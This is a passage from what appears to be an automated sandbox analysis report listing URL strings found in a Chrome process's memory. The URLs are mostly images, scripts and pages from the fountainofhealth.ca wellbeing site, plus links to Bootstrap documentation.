Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icons8-download-40.png
Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489590171.000028EC03E8C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icons8-up-64.png
Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icons8-up-64.png(
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487690510.000028EC03BC4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/leaves-banner-2_0_0.jpg
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/redirect%20icone%20.png
Source: chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/redirect%20icone%20.png3
Source: chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/twitter-t.svg
Source: chrome.exe, 00000000.00000002.2487690510.000028EC03BC4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/twitter.svg
Source: chrome.exe, 00000000.00000002.2487690510.000028EC03BC4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/twitter.svg.gif
Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/twitter.svgeHandlerjs
Source: chrome.exe, 00000000.00000002.2487690510.000028EC03BC4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/wellness-app.gif
Source: chrome.exe, 00000000.00000002.2487690510.000028EC03BC4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/wellness-app.gifd-2.jpg
Source: chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/youtube-t.svg
Source: chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/youtube.svg
Source: chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/youtube.svgg
Source: chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2319699836.000028EC0490C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/styles/slider1/public/2023-12/Group%209825%20%282%29
Source: chrome.exe, 00000000.00000002.2490296198.000028EC03F64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/t
Source: chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2467653990.000028EC02270000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/th.ca/
Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484699862.000028EC03718000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486385269.000028EC03974000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/dialog.js?swjs7b
Source: chrome.exe, 00000000.00000002.2491036779.000028EC0402C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495335688.000028EC047D8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491256401.000028EC04045000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/drupal.bootstrap.js?swjs7b
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2467653990.000028EC02270000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/ajax.js?swjs7b
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2319699836.000028EC0490C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/message.js?swjs7b
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500311139.000028EC06614000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491141569.000028EC04034000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/progress.js?swjs7b
Source: chrome.exe, 00000000.00000003.2319331070.000028EC06828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/progress.js?swjs7baDb
Source: chrome.exe, 00000000.00000002.2496387557.000028EC04944000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484699862.000028EC03718000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2491256401.000028EC04045000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/modal.jquery.ui.bridge.js?swjs7b
Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488681723.000028EC03D38000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/modal.js?swjs7b
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/css/img/icons8-search-28.png
Source: chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/css/questionnaire.css?swjs7b
Source: chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/css/questionnaire.css?swjs7btured-2.jpg
Source: chrome.exe, 00000000.00000002.2489880900.000028EC03EE0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swjs7b
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/images/Testimonials/Aging_featured-2.jpg
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489590171.000028EC03E8C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/images/Testimonials/doctor-21.jpg
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/images/Testimonials/speakers-420.jpg
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/images/Testimonials/speakers-420.jpgjpg
Source: chrome.exe, 00000000.00000002.2491036779.000028EC0402C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496640859.000028EC04998000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/js/banner-slider.js?swjs7b
Source: chrome.exe, 00000000.00000002.2504370678.000028EC078C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/js/banner-slider.js?swjs7ba
Source: chrome.exe, 00000000.00000002.2504370678.000028EC078C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/js/banner-slider.js?swjs7baDb
Source: chrome.exe, 00000000.00000003.2371195957.000028EC04024000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481401055.000028EC0337C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/js/custom.js?swjs7b
Source: chrome.exe, 00000000.00000003.2371195957.000028EC04024000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/js/custom.js?swjs7b:491:6
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2342988019.000028EC063A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC1D000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/js/script.js?swjs7b
Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/thrive--quiz
Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499247188.000028EC062C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/thrive-c-approach-wellbeing
Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361293065.000028EC067ED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499781921.000028EC06410000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/thrive/additional-tools-and-links
Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/thrive/additional-tools-and-linksv=10.1.0
Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/thrive/emotions
Source: chrome.exe, 00000000.00000003.2361293065.000028EC067ED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500311139.000028EC06614000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/thrive/end-user-licence-agreement
Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494650570.000028EC045A4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/thrive/health-habits
Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/thrive/interests
Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499247188.000028EC062C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/thrive/privacy-policy
Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499247188.000028EC062C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494650570.000028EC045A4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/thrive/relationship
Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2344648335.000028EC067DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2344735211.000028EC02578000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501198410.000028EC068C4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/thrive/request-a-speaker#request-speaker
Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/thrive/resources
Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361293065.000028EC067ED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/thrive/sitemap
Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494650570.000028EC045A4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/thrive/thoughts
Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499247188.000028EC062C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494650570.000028EC045A4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/thrive/valued-goals
Source: chrome.exe, 00000000.00000003.2361293065.000028EC067ED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504302862.000028EC078A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/toolkit
Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca:443
Source: chrome.exe, 00000000.00000002.2501591890.000028EC06B12000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484400894.000028EC036F9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca_default
Source: chrome.exe, 00000000.00000002.2481950611.000028EC033E0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3AD000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2503938588.000028EC0782C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.cadate:Thu
Source: chrome.exe, 00000000.00000002.2501591890.000028EC06B12000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484400894.000028EC036F9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.cawww.youtube.com_default
Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getbootstrap.com/)
Source: chrome.exe, 00000000.00000003.2321101380.000028EC04ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#affix
Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#alerts
Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#buttons
Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#carousel
Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#collapse
